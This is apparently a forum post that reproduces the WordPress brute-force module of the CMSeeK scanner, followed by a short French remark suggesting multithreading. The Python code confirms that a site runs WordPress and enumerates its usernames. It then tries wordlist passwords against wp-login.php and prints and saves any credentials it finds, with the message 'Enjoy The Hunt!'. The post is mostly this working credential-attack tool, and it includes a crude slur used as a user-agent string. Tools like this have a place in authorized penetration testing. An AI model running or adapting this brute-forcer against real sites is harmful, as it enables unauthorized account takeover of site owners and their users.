1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
| import cmseekdb.basic as cmseek
import cmseekdb.sc as source # Contains function to detect cms from source code
import cmseekdb.header as header # Contains function to detect CMS from gathered http headers
import deepscans.wp.userenum as wp_user_enum
import multiprocessing ## Let's speed things up a lil bit (actually a hell lot faster) shell we?
from functools import partial ## needed somewhere :/
import sys
import cmseekdb.generator as generator
def start():
cmseek.clearscreen()
cmseek.banner("WordPress Bruteforce Module")
url = cmseek.targetinp("") # input('Enter Url: ')
cmseek.info("Checking for WordPress")
bsrc = cmseek.getsource(url, cmseek.randomua('thiscanbeanythingasfarasnowletitbewhatilovethemost'))
if bsrc[0] != '1':
# print(bsrc[1])
cmseek.error("Could not get target source, CMSeek is quitting")
cmseek.handle_quit()
else:
## Parse generator meta tag
parse_generator = generator.parse(bsrc[1])
ga = parse_generator[0]
ga_content = parse_generator[1]
try1 = generator.scan(ga_content)
if try1[0] == '1' and try1[1] == 'wp':
wpcnf = '1'
else:
try2 = source.check(bsrc[1], url)
if try2[0] == '1' and try2[1] == 'wp':
wpcnf = '1'
else:
wpcnf = '0'
if wpcnf != '1':
print(bsrc[1])
cmseek.error('Could not confirm WordPress... CMSeek is quitting')
cmseek.handle_quit()
else:
cmseek.success("WordPress Confirmed... Checking for WordPress login form")
wploginsrc = cmseek.getsource(url + '/wp-login.php', cmseek.randomua('thatsprettygay'))
if wploginsrc[0] == '1' and '<form' in wploginsrc[1]:
cmseek.success("Login form found.. Detecting Username For Bruteforce")
wpparamuser = []
uenum = wp_user_enum.start('wp', url, cmseek.randomua('r'), '0', bsrc[1])
usernamesgen = uenum[0]
wpparamuser = uenum[1]
if wpparamuser == []:
customuser = input("[~] CMSeek could not enumerate usernames, enter username if you know any: ")
if customuser == "":
cmseek.error("No user found, CMSeek is quitting")
else:
wpparamuser.append(customuser)
wpbruteusers = set(wpparamuser)
for user in wpbruteusers:
passfound = '0'
print('\n')
cmseek.info("Bruteforcing User: " + cmseek.bold + user + cmseek.cln)
with open("wordlist/passwords.txt", "r") as pwd_file:
passwords = pwd_file.read().split('\n')
passwords.insert(0, user)
passwords.insert(0, user[::-1])
for password in passwords:
print(password)
if password != '' and password != '\n':
sys.stdout.write('[*] Testing Password: ')
sys.stdout.write('%s\r\r' % password)
sys.stdout.flush()
cursrc = cmseek.wpbrutesrc(url, user, password)
if 'wp-admin' in str(cursrc[3]):
cmseek.success('Password found!')
print(" |\n |--[username]--> " + cmseek.bold + user + cmseek.cln + "\n |\n |--[password]--> " + cmseek.bold + password + cmseek.cln + "\n |")
cmseek.success('Enjoy The Hunt!')
cmseek.savebrute(url,url + '/wp-login.php',user,password)
passfound = '1'
break
else:
continue
break
if passfound == '0':
cmseek.error('\n\nCould Not find Password!')
print('\n\n')
else:
cmseek.error("Couldn't find login form... CMSeeK is quitting")
# print(wploginsrc[1])
cmseek.handle_quit() |
utiliser le multithread
Répondre avec citation
Partager